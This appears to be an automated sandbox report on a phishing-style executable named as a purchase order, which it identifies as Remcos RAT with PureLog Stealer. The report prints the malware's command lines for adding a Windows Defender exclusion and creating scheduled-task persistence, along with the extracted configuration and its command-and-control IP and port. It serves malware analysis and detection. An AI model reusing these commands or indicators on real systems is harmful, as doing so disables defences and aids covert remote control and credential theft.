
Windows Analysis Report
Supplier Purchase Order - PO0002491.exe

Overview

General Information

Sample name: Supplier Purchase Order - PO0002491.exe
Analysis ID: 1541115
MD5: 9fe3811c49214479c36a4f4a35e9ca08
SHA1: eddbde04b9751295e209addc60de427c07b4cf1e
SHA256: 3a15b2df43b3665b869280969adaec6fc18de92f2da83e1d0228d7379fd55e09
Tags: exe, user-threatcat_ch

Detection

Remcos, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Supplier Purchase Order - PO0002491.exe (PID: 1868 cmdline: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe" MD5: 9FE3811C49214479C36A4F4A35E9CA08)
    • powershell.exe (PID: 3724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 344 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4484 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • keHuNxIumw.exe (PID: 1436 cmdline: C:\Users\user\AppData\Roaming\keHuNxIumw.exe MD5: 9FE3811C49214479C36A4F4A35E9CA08)
    • schtasks.exe (PID: 3748 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • keHuNxIumw.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Roaming\keHuNxIumw.exe" MD5: 9FE3811C49214479C36A4F4A35E9CA08)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.210.150.14:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GOFAGZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author
0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(24 entries in total; only the first five are shown here)

Source | Rule | Description | Author
0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Supplier Purchase Order - PO0002491.exe.7aa0000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
12.2.keHuNxIumw.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
12.2.keHuNxIumw.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
12.2.keHuNxIumw.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
(31 entries in total; only the first five are shown here)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", ProcessId: 3724, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\keHuNxIumw.exe, ParentImage: C:\Users\user\AppData\Roaming\keHuNxIumw.exe, ParentProcessId: 1436, ParentProcessName: keHuNxIumw.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp", ProcessId: 3748, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", ProcessId: 4484, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe", ProcessId: 3724, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe", ParentImage: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ParentProcessId: 1868, ParentProcessName: Supplier Purchase Order - PO0002491.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp", ProcessId: 4484, ProcessName: schtasks.exe

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 1B 46 CC 3C 14 80 AB 02 C8 5E C9 68 00 90 CD 42 66 5F 9E 50 E2 23 AD 7C 95 78 E6 18 80 52 AB 3D 21 25 0F 52 47 CB 12 1F 4F 71 DE 8B B0 9B 51 4B 20 BF 5F 62 09 98 04 AF 23 AC F2 94 A9 11 0B F6 1F CC DA 7B EF C1 CD B5 ED BB 49 D2 D6 DC 02 35 38 12 D1 09 1B 75 09 4E F4 65 C2 71 03 9A D6 E4 86 1C A4 D9 22 6A 5D 31 77 53 A6 55 62 80 B8 0B 11 D9 A2 A6 A2 2B 55 25 48 DF 22 E6 3D 12 44 F4 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe, ProcessId: 5972, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-GOFAGZ\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T12:58:12.110788+0200 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49708 | 192.210.150.14 | 2404 | TCP
2024-10-24T12:58:12.784600+0200 | 2032777 | 1 | Malware Command and Control Activity Detected | 192.210.150.14 | 2404 | 192.168.2.5 | 49708 | TCP
2024-10-24T13:00:16.623458+0200 | 2032777 | 1 | Malware Command and Control Activity Detected | 192.210.150.14 | 2404 | 192.168.2.5 | 49708 | TCP
2024-10-24T12:58:14.440169+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 178.237.33.50 | 80 | TCP


AV Detection

Source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.14:2404:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GOFAGZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | ReversingLabs: Detection: 73%
Source: Supplier Purchase Order - PO0002491.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Joe Sandbox ML: detected
Source: Supplier Purchase Order - PO0002491.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_004338C8
Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_58eed15b-8

Exploits

Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00407538 _wcslen,CoGetObject,12_2_00407538
Source: Supplier Purchase Order - PO0002491.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Supplier Purchase Order - PO0002491.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ldPH.pdb source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr
Source: Binary string: ldPH.pdbSHA256 source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2

Networking

Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49708 -> 192.210.150.14:2404
Source: Network traffic | Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.14:2404 -> 192.168.2.5:49708
Source: Malware configuration extractor | IPs: 192.210.150.14
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49710 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0041B411
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, keHuNxIumw.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, keHuNxIumw.exe, 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
Source: Supplier Purchase Order - PO0002491.exe, 00000000.00000002.2161767525.00000000033C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: keHuNxIumw.exe, 00000008.00000002.2241166985.0000000002B46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP#
Source: Supplier Purchase Order - PO0002491.exe, keHuNxIumw.exe.0.dr | String found in binary or memory: http://tempuri.org/DataSet1.xsd

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000,12_2_0040A2F3
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B749
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168FC
Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_0040A41B
Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR

E-Banking Fraud

Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.keHuNxIumw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4ec0e08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Supplier Purchase Order - PO0002491.exe.4485430.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2239762591.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2162828699.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 5972, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: keHuNxIumw.exe PID: 4464, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041CA73 SystemParametersInfoW, | 12_2_0041CA73

